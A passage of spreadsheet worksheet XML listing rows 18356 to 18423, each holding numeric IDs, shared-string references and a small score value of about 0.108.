      <c r="E18356" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18356" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18357" ht="15.75" customHeight="1">
      <c r="A18357" s="1">
        <v>20825.0</v>
      </c>
      <c r="B18357" s="2">
        <v>1.5408064E7</v>
      </c>
      <c r="C18357" s="2" t="s">
        <v>17697</v>
      </c>
      <c r="D18357" s="2">
        <v>1.0</v>
      </c>
      <c r="E18357" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18357" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18358" ht="15.75" customHeight="1">
      <c r="A18358" s="1">
        <v>20907.0</v>
      </c>
      <c r="B18358" s="2">
        <v>1.6280298E7</v>
      </c>
      <c r="C18358" s="2" t="s">
        <v>17698</v>
      </c>
      <c r="D18358" s="2">
        <v>1.0</v>
      </c>
      <c r="E18358" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18358" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18359" ht="15.75" customHeight="1">
      <c r="A18359" s="1">
        <v>21028.0</v>
      </c>
      <c r="B18359" s="2">
        <v>1.7505019E7</v>
      </c>
      <c r="C18359" s="2" t="s">
        <v>17699</v>
      </c>
      <c r="D18359" s="2">
        <v>1.0</v>
      </c>
      <c r="E18359" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18359" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18360" ht="15.75" customHeight="1">
      <c r="A18360" s="1">
        <v>21074.0</v>
      </c>
      <c r="B18360" s="2">
        <v>1.7964717E7</v>
      </c>
      <c r="C18360" s="2" t="s">
        <v>17700</v>
      </c>
      <c r="D18360" s="2">
        <v>1.0</v>
      </c>
      <c r="E18360" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18360" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18361" ht="15.75" customHeight="1">
      <c r="A18361" s="1">
        <v>21467.0</v>
      </c>
      <c r="B18361" s="2">
        <v>2.2803116E7</v>
      </c>
      <c r="C18361" s="2" t="s">
        <v>17701</v>
      </c>
      <c r="D18361" s="2">
        <v>1.0</v>
      </c>
      <c r="E18361" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18361" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18362" ht="15.75" customHeight="1">
      <c r="A18362" s="1">
        <v>21569.0</v>
      </c>
      <c r="B18362" s="2">
        <v>2.3778168E7</v>
      </c>
      <c r="C18362" s="2" t="s">
        <v>17702</v>
      </c>
      <c r="D18362" s="2">
        <v>1.0</v>
      </c>
      <c r="E18362" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18362" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18363" ht="15.75" customHeight="1">
      <c r="A18363" s="1">
        <v>21950.0</v>
      </c>
      <c r="B18363" s="2">
        <v>2.8868809E7</v>
      </c>
      <c r="C18363" s="2" t="s">
        <v>17703</v>
      </c>
      <c r="D18363" s="2">
        <v>1.0</v>
      </c>
      <c r="E18363" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18363" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18364" ht="15.75" customHeight="1">
      <c r="A18364" s="1">
        <v>22265.0</v>
      </c>
      <c r="B18364" s="2">
        <v>3.3089138E7</v>
      </c>
      <c r="C18364" s="2" t="s">
        <v>17704</v>
      </c>
      <c r="D18364" s="2">
        <v>1.0</v>
      </c>
      <c r="E18364" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18364" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18365" ht="15.75" customHeight="1">
      <c r="A18365" s="1">
        <v>22313.0</v>
      </c>
      <c r="B18365" s="2">
        <v>3.3908489E7</v>
      </c>
      <c r="C18365" s="2" t="s">
        <v>17705</v>
      </c>
      <c r="D18365" s="2">
        <v>1.0</v>
      </c>
      <c r="E18365" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18365" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18366" ht="15.75" customHeight="1">
      <c r="A18366" s="1">
        <v>22391.0</v>
      </c>
      <c r="B18366" s="2">
        <v>3.5387833E7</v>
      </c>
      <c r="C18366" s="2" t="s">
        <v>17706</v>
      </c>
      <c r="D18366" s="2">
        <v>1.0</v>
      </c>
      <c r="E18366" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18366" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18367" ht="15.75" customHeight="1">
      <c r="A18367" s="1">
        <v>22444.0</v>
      </c>
      <c r="B18367" s="2">
        <v>3625069.0</v>
      </c>
      <c r="C18367" s="2" t="s">
        <v>17707</v>
      </c>
      <c r="D18367" s="2">
        <v>1.0</v>
      </c>
      <c r="E18367" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18367" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18368" ht="15.75" customHeight="1">
      <c r="A18368" s="1">
        <v>22750.0</v>
      </c>
      <c r="B18368" s="2">
        <v>4.4422492E7</v>
      </c>
      <c r="C18368" s="2" t="s">
        <v>17708</v>
      </c>
      <c r="D18368" s="2">
        <v>1.0</v>
      </c>
      <c r="E18368" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18368" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18369" ht="15.75" customHeight="1">
      <c r="A18369" s="1">
        <v>23064.0</v>
      </c>
      <c r="B18369" s="2">
        <v>5.0417493E7</v>
      </c>
      <c r="C18369" s="2" t="s">
        <v>17709</v>
      </c>
      <c r="D18369" s="2">
        <v>1.0</v>
      </c>
      <c r="E18369" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18369" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18370" ht="15.75" customHeight="1">
      <c r="A18370" s="1">
        <v>23252.0</v>
      </c>
      <c r="B18370" s="2">
        <v>5310074.0</v>
      </c>
      <c r="C18370" s="2" t="s">
        <v>17710</v>
      </c>
      <c r="D18370" s="2">
        <v>1.0</v>
      </c>
      <c r="E18370" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18370" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18371" ht="15.75" customHeight="1">
      <c r="A18371" s="1">
        <v>23386.0</v>
      </c>
      <c r="B18371" s="2">
        <v>5.5614957E7</v>
      </c>
      <c r="C18371" s="2" t="s">
        <v>17711</v>
      </c>
      <c r="D18371" s="2">
        <v>1.0</v>
      </c>
      <c r="E18371" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18371" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18372" ht="15.75" customHeight="1">
      <c r="A18372" s="1">
        <v>23510.0</v>
      </c>
      <c r="B18372" s="2">
        <v>5826656.0</v>
      </c>
      <c r="C18372" s="2" t="s">
        <v>17712</v>
      </c>
      <c r="D18372" s="2">
        <v>1.0</v>
      </c>
      <c r="E18372" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18372" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18373" ht="15.75" customHeight="1">
      <c r="A18373" s="1">
        <v>23647.0</v>
      </c>
      <c r="B18373" s="2">
        <v>6722193.0</v>
      </c>
      <c r="C18373" s="2" t="s">
        <v>17713</v>
      </c>
      <c r="D18373" s="2">
        <v>1.0</v>
      </c>
      <c r="E18373" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18373" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18374" ht="15.75" customHeight="1">
      <c r="A18374" s="1">
        <v>23832.0</v>
      </c>
      <c r="B18374" s="2">
        <v>8080534.0</v>
      </c>
      <c r="C18374" s="2" t="s">
        <v>17714</v>
      </c>
      <c r="D18374" s="2">
        <v>1.0</v>
      </c>
      <c r="E18374" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18374" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18375" ht="15.75" customHeight="1">
      <c r="A18375" s="1">
        <v>23891.0</v>
      </c>
      <c r="B18375" s="2">
        <v>8425293.0</v>
      </c>
      <c r="C18375" s="2" t="s">
        <v>17715</v>
      </c>
      <c r="D18375" s="2">
        <v>1.0</v>
      </c>
      <c r="E18375" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18375" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18376" ht="15.75" customHeight="1">
      <c r="A18376" s="1">
        <v>25459.0</v>
      </c>
      <c r="B18376" s="2">
        <v>1.3968865E7</v>
      </c>
      <c r="C18376" s="2" t="s">
        <v>17716</v>
      </c>
      <c r="D18376" s="2">
        <v>1.0</v>
      </c>
      <c r="E18376" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18376" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18377" ht="15.75" customHeight="1">
      <c r="A18377" s="1">
        <v>25680.0</v>
      </c>
      <c r="B18377" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C18377" s="2" t="s">
        <v>17717</v>
      </c>
      <c r="D18377" s="2">
        <v>1.0</v>
      </c>
      <c r="E18377" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18377" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18378" ht="15.75" customHeight="1">
      <c r="A18378" s="1">
        <v>26002.0</v>
      </c>
      <c r="B18378" s="2">
        <v>1.5332537E7</v>
      </c>
      <c r="C18378" s="2" t="s">
        <v>17718</v>
      </c>
      <c r="D18378" s="2">
        <v>1.0</v>
      </c>
      <c r="E18378" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18378" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18379" ht="15.75" customHeight="1">
      <c r="A18379" s="1">
        <v>26107.0</v>
      </c>
      <c r="B18379" s="2">
        <v>1.5776131E7</v>
      </c>
      <c r="C18379" s="2" t="s">
        <v>17719</v>
      </c>
      <c r="D18379" s="2">
        <v>1.0</v>
      </c>
      <c r="E18379" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18379" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18380" ht="15.75" customHeight="1">
      <c r="A18380" s="1">
        <v>26323.0</v>
      </c>
      <c r="B18380" s="2">
        <v>1.6674933E7</v>
      </c>
      <c r="C18380" s="2" t="s">
        <v>17720</v>
      </c>
      <c r="D18380" s="2">
        <v>1.0</v>
      </c>
      <c r="E18380" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18380" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18381" ht="15.75" customHeight="1">
      <c r="A18381" s="1">
        <v>26485.0</v>
      </c>
      <c r="B18381" s="2">
        <v>1.7505018E7</v>
      </c>
      <c r="C18381" s="2" t="s">
        <v>17699</v>
      </c>
      <c r="D18381" s="2">
        <v>1.0</v>
      </c>
      <c r="E18381" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18381" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18382" ht="15.75" customHeight="1">
      <c r="A18382" s="1">
        <v>26648.0</v>
      </c>
      <c r="B18382" s="2">
        <v>1.8048644E7</v>
      </c>
      <c r="C18382" s="2" t="s">
        <v>17721</v>
      </c>
      <c r="D18382" s="2">
        <v>1.0</v>
      </c>
      <c r="E18382" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18382" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18383" ht="15.75" customHeight="1">
      <c r="A18383" s="1">
        <v>26770.0</v>
      </c>
      <c r="B18383" s="2">
        <v>1.8488898E7</v>
      </c>
      <c r="C18383" s="2" t="s">
        <v>17722</v>
      </c>
      <c r="D18383" s="2">
        <v>1.0</v>
      </c>
      <c r="E18383" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18383" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18384" ht="15.75" customHeight="1">
      <c r="A18384" s="1">
        <v>27004.0</v>
      </c>
      <c r="B18384" s="2">
        <v>1.9948284E7</v>
      </c>
      <c r="C18384" s="2" t="s">
        <v>17723</v>
      </c>
      <c r="D18384" s="2">
        <v>1.0</v>
      </c>
      <c r="E18384" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18384" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18385" ht="15.75" customHeight="1">
      <c r="A18385" s="1">
        <v>27662.0</v>
      </c>
      <c r="B18385" s="2">
        <v>2.2907304E7</v>
      </c>
      <c r="C18385" s="2" t="s">
        <v>17724</v>
      </c>
      <c r="D18385" s="2">
        <v>1.0</v>
      </c>
      <c r="E18385" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18385" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18386" ht="15.75" customHeight="1">
      <c r="A18386" s="1">
        <v>27925.0</v>
      </c>
      <c r="B18386" s="2">
        <v>2.3778167E7</v>
      </c>
      <c r="C18386" s="2" t="s">
        <v>17702</v>
      </c>
      <c r="D18386" s="2">
        <v>1.0</v>
      </c>
      <c r="E18386" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18386" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18387" ht="15.75" customHeight="1">
      <c r="A18387" s="1">
        <v>28263.0</v>
      </c>
      <c r="B18387" s="2">
        <v>2.536899E7</v>
      </c>
      <c r="C18387" s="2" t="s">
        <v>17725</v>
      </c>
      <c r="D18387" s="2">
        <v>1.0</v>
      </c>
      <c r="E18387" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18387" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18388" ht="15.75" customHeight="1">
      <c r="A18388" s="1">
        <v>28336.0</v>
      </c>
      <c r="B18388" s="2">
        <v>2.5879564E7</v>
      </c>
      <c r="C18388" s="2" t="s">
        <v>17726</v>
      </c>
      <c r="D18388" s="2">
        <v>1.0</v>
      </c>
      <c r="E18388" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18388" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18389" ht="15.75" customHeight="1">
      <c r="A18389" s="1">
        <v>28567.0</v>
      </c>
      <c r="B18389" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C18389" s="2" t="s">
        <v>17727</v>
      </c>
      <c r="D18389" s="2">
        <v>1.0</v>
      </c>
      <c r="E18389" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18389" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18390" ht="15.75" customHeight="1">
      <c r="A18390" s="1">
        <v>28827.0</v>
      </c>
      <c r="B18390" s="2">
        <v>2.8835133E7</v>
      </c>
      <c r="C18390" s="2" t="s">
        <v>17728</v>
      </c>
      <c r="D18390" s="2">
        <v>1.0</v>
      </c>
      <c r="E18390" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18390" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18391" ht="15.75" customHeight="1">
      <c r="A18391" s="1">
        <v>28830.0</v>
      </c>
      <c r="B18391" s="2">
        <v>2.8868808E7</v>
      </c>
      <c r="C18391" s="2" t="s">
        <v>17703</v>
      </c>
      <c r="D18391" s="2">
        <v>1.0</v>
      </c>
      <c r="E18391" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18391" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18392" ht="15.75" customHeight="1">
      <c r="A18392" s="1">
        <v>29555.0</v>
      </c>
      <c r="B18392" s="2">
        <v>3.3103324E7</v>
      </c>
      <c r="C18392" s="2" t="s">
        <v>17729</v>
      </c>
      <c r="D18392" s="2">
        <v>1.0</v>
      </c>
      <c r="E18392" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18392" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18393" ht="15.75" customHeight="1">
      <c r="A18393" s="1">
        <v>29568.0</v>
      </c>
      <c r="B18393" s="2">
        <v>3.3251886E7</v>
      </c>
      <c r="C18393" s="2" t="s">
        <v>17730</v>
      </c>
      <c r="D18393" s="2">
        <v>1.0</v>
      </c>
      <c r="E18393" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18393" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18394" ht="15.75" customHeight="1">
      <c r="A18394" s="1">
        <v>29573.0</v>
      </c>
      <c r="B18394" s="2">
        <v>3.3339651E7</v>
      </c>
      <c r="C18394" s="2" t="s">
        <v>17731</v>
      </c>
      <c r="D18394" s="2">
        <v>1.0</v>
      </c>
      <c r="E18394" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18394" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18395" ht="15.75" customHeight="1">
      <c r="A18395" s="1">
        <v>29758.0</v>
      </c>
      <c r="B18395" s="2">
        <v>3.4803594E7</v>
      </c>
      <c r="C18395" s="2" t="s">
        <v>17732</v>
      </c>
      <c r="D18395" s="2">
        <v>1.0</v>
      </c>
      <c r="E18395" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18395" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18396" ht="15.75" customHeight="1">
      <c r="A18396" s="1">
        <v>29780.0</v>
      </c>
      <c r="B18396" s="2">
        <v>3.5006535E7</v>
      </c>
      <c r="C18396" s="2" t="s">
        <v>17733</v>
      </c>
      <c r="D18396" s="2">
        <v>1.0</v>
      </c>
      <c r="E18396" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18396" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18397" ht="15.75" customHeight="1">
      <c r="A18397" s="1">
        <v>30140.0</v>
      </c>
      <c r="B18397" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C18397" s="2" t="s">
        <v>17734</v>
      </c>
      <c r="D18397" s="2">
        <v>1.0</v>
      </c>
      <c r="E18397" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18397" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18398" ht="15.75" customHeight="1">
      <c r="A18398" s="1">
        <v>30766.0</v>
      </c>
      <c r="B18398" s="2">
        <v>4.4422491E7</v>
      </c>
      <c r="C18398" s="2" t="s">
        <v>17708</v>
      </c>
      <c r="D18398" s="2">
        <v>1.0</v>
      </c>
      <c r="E18398" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18398" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18399" ht="15.75" customHeight="1">
      <c r="A18399" s="1">
        <v>31054.0</v>
      </c>
      <c r="B18399" s="2">
        <v>4.7982977E7</v>
      </c>
      <c r="C18399" s="2" t="s">
        <v>17735</v>
      </c>
      <c r="D18399" s="2">
        <v>1.0</v>
      </c>
      <c r="E18399" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18399" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18400" ht="15.75" customHeight="1">
      <c r="A18400" s="1">
        <v>31422.0</v>
      </c>
      <c r="B18400" s="2">
        <v>5.0125662E7</v>
      </c>
      <c r="C18400" s="2" t="s">
        <v>17736</v>
      </c>
      <c r="D18400" s="2">
        <v>1.0</v>
      </c>
      <c r="E18400" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18400" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18401" ht="15.75" customHeight="1">
      <c r="A18401" s="1">
        <v>32577.0</v>
      </c>
      <c r="B18401" s="2">
        <v>5780327.0</v>
      </c>
      <c r="C18401" s="2" t="s">
        <v>17737</v>
      </c>
      <c r="D18401" s="2">
        <v>1.0</v>
      </c>
      <c r="E18401" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18401" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18402" ht="15.75" customHeight="1">
      <c r="A18402" s="1">
        <v>33099.0</v>
      </c>
      <c r="B18402" s="2">
        <v>6958288.0</v>
      </c>
      <c r="C18402" s="2" t="s">
        <v>17738</v>
      </c>
      <c r="D18402" s="2">
        <v>1.0</v>
      </c>
      <c r="E18402" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18402" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18403" ht="15.75" customHeight="1">
      <c r="A18403" s="1">
        <v>33281.0</v>
      </c>
      <c r="B18403" s="2">
        <v>7430209.0</v>
      </c>
      <c r="C18403" s="2" t="s">
        <v>17739</v>
      </c>
      <c r="D18403" s="2">
        <v>1.0</v>
      </c>
      <c r="E18403" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18403" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18404" ht="15.75" customHeight="1">
      <c r="A18404" s="1">
        <v>33427.0</v>
      </c>
      <c r="B18404" s="2">
        <v>7775522.0</v>
      </c>
      <c r="C18404" s="2" t="s">
        <v>17740</v>
      </c>
      <c r="D18404" s="2">
        <v>1.0</v>
      </c>
      <c r="E18404" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18404" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18405" ht="15.75" customHeight="1">
      <c r="A18405" s="1">
        <v>33504.0</v>
      </c>
      <c r="B18405" s="2">
        <v>8063978.0</v>
      </c>
      <c r="C18405" s="2" t="s">
        <v>17741</v>
      </c>
      <c r="D18405" s="2">
        <v>1.0</v>
      </c>
      <c r="E18405" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18405" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18406" ht="15.75" customHeight="1">
      <c r="A18406" s="1">
        <v>83.0</v>
      </c>
      <c r="B18406" s="2">
        <v>1197111.0</v>
      </c>
      <c r="C18406" s="2" t="s">
        <v>17742</v>
      </c>
      <c r="D18406" s="2">
        <v>1.0</v>
      </c>
      <c r="E18406" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18406" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18407" ht="15.75" customHeight="1">
      <c r="A18407" s="1">
        <v>2031.0</v>
      </c>
      <c r="B18407" s="2">
        <v>3.0811432E7</v>
      </c>
      <c r="C18407" s="2" t="s">
        <v>17743</v>
      </c>
      <c r="D18407" s="2">
        <v>1.0</v>
      </c>
      <c r="E18407" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18407" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18408" ht="15.75" customHeight="1">
      <c r="A18408" s="1">
        <v>10563.0</v>
      </c>
      <c r="B18408" s="2">
        <v>1.2864509E7</v>
      </c>
      <c r="C18408" s="2" t="s">
        <v>17744</v>
      </c>
      <c r="D18408" s="2">
        <v>1.0</v>
      </c>
      <c r="E18408" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18408" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18409" ht="15.75" customHeight="1">
      <c r="A18409" s="1">
        <v>10582.0</v>
      </c>
      <c r="B18409" s="2">
        <v>1.3178106E7</v>
      </c>
      <c r="C18409" s="2" t="s">
        <v>17745</v>
      </c>
      <c r="D18409" s="2">
        <v>1.0</v>
      </c>
      <c r="E18409" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18409" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18410" ht="15.75" customHeight="1">
      <c r="A18410" s="1">
        <v>16282.0</v>
      </c>
      <c r="B18410" s="2">
        <v>4.5796131E7</v>
      </c>
      <c r="C18410" s="2" t="s">
        <v>17746</v>
      </c>
      <c r="D18410" s="2">
        <v>1.0</v>
      </c>
      <c r="E18410" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18410" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18411" ht="15.75" customHeight="1">
      <c r="A18411" s="1">
        <v>19559.0</v>
      </c>
      <c r="B18411" s="2">
        <v>5.6070242E7</v>
      </c>
      <c r="C18411" s="2" t="s">
        <v>17747</v>
      </c>
      <c r="D18411" s="2">
        <v>1.0</v>
      </c>
      <c r="E18411" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18411" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18412" ht="15.75" customHeight="1">
      <c r="A18412" s="1">
        <v>20434.0</v>
      </c>
      <c r="B18412" s="2">
        <v>1.2370334E7</v>
      </c>
      <c r="C18412" s="2" t="s">
        <v>17748</v>
      </c>
      <c r="D18412" s="2">
        <v>1.0</v>
      </c>
      <c r="E18412" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18412" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18413" ht="15.75" customHeight="1">
      <c r="A18413" s="1">
        <v>21452.0</v>
      </c>
      <c r="B18413" s="2">
        <v>2.2647883E7</v>
      </c>
      <c r="C18413" s="2" t="s">
        <v>17749</v>
      </c>
      <c r="D18413" s="2">
        <v>1.0</v>
      </c>
      <c r="E18413" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18413" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18414" ht="15.75" customHeight="1">
      <c r="A18414" s="1">
        <v>22985.0</v>
      </c>
      <c r="B18414" s="2">
        <v>4931368.0</v>
      </c>
      <c r="C18414" s="2" t="s">
        <v>17750</v>
      </c>
      <c r="D18414" s="2">
        <v>1.0</v>
      </c>
      <c r="E18414" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18414" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18415" ht="15.75" customHeight="1">
      <c r="A18415" s="1">
        <v>23504.0</v>
      </c>
      <c r="B18415" s="2">
        <v>5780328.0</v>
      </c>
      <c r="C18415" s="2" t="s">
        <v>17751</v>
      </c>
      <c r="D18415" s="2">
        <v>1.0</v>
      </c>
      <c r="E18415" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18415" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18416" ht="15.75" customHeight="1">
      <c r="A18416" s="1">
        <v>24982.0</v>
      </c>
      <c r="B18416" s="2">
        <v>1.2678679E7</v>
      </c>
      <c r="C18416" s="2" t="s">
        <v>17752</v>
      </c>
      <c r="D18416" s="2">
        <v>1.0</v>
      </c>
      <c r="E18416" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18416" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18417" ht="15.75" customHeight="1">
      <c r="A18417" s="1">
        <v>25162.0</v>
      </c>
      <c r="B18417" s="2">
        <v>1.3075093E7</v>
      </c>
      <c r="C18417" s="2" t="s">
        <v>17753</v>
      </c>
      <c r="D18417" s="2">
        <v>1.0</v>
      </c>
      <c r="E18417" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18417" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18418" ht="15.75" customHeight="1">
      <c r="A18418" s="1">
        <v>29042.0</v>
      </c>
      <c r="B18418" s="2">
        <v>3.0171535E7</v>
      </c>
      <c r="C18418" s="2" t="s">
        <v>17754</v>
      </c>
      <c r="D18418" s="2">
        <v>1.0</v>
      </c>
      <c r="E18418" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18418" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18419" ht="15.75" customHeight="1">
      <c r="A18419" s="1">
        <v>31872.0</v>
      </c>
      <c r="B18419" s="2">
        <v>5285794.0</v>
      </c>
      <c r="C18419" s="2" t="s">
        <v>17755</v>
      </c>
      <c r="D18419" s="2">
        <v>1.0</v>
      </c>
      <c r="E18419" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18419" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18420" ht="15.75" customHeight="1">
      <c r="A18420" s="1">
        <v>32600.0</v>
      </c>
      <c r="B18420" s="2">
        <v>5820485.0</v>
      </c>
      <c r="C18420" s="2" t="s">
        <v>17756</v>
      </c>
      <c r="D18420" s="2">
        <v>1.0</v>
      </c>
      <c r="E18420" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18420" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18421" ht="15.75" customHeight="1">
      <c r="A18421" s="1">
        <v>32942.0</v>
      </c>
      <c r="B18421" s="2">
        <v>6462103.0</v>
      </c>
      <c r="C18421" s="2" t="s">
        <v>17757</v>
      </c>
      <c r="D18421" s="2">
        <v>1.0</v>
      </c>
      <c r="E18421" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18421" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18422" ht="15.75" customHeight="1">
      <c r="A18422" s="1">
        <v>33726.0</v>
      </c>
      <c r="B18422" s="2">
        <v>8526034.0</v>
      </c>
      <c r="C18422" s="2" t="s">
        <v>17758</v>
      </c>
      <c r="D18422" s="2">
        <v>1.0</v>
      </c>
      <c r="E18422" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18422" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="18423" ht="15.75" customHeight="1">
      <c r="A18423" s="1">
        <v>2414.0</v>
      </c>
      <c r="B18423" s="2">
        <v>3.351377E7</v>
      </c>
      <c r="C18423" s="2" t="s">
        <v>17759</v>
      </c>
      <c r="D18423" s="2">
        <v>1.0</v>
      </c>
      <c r="E18423" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18423" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
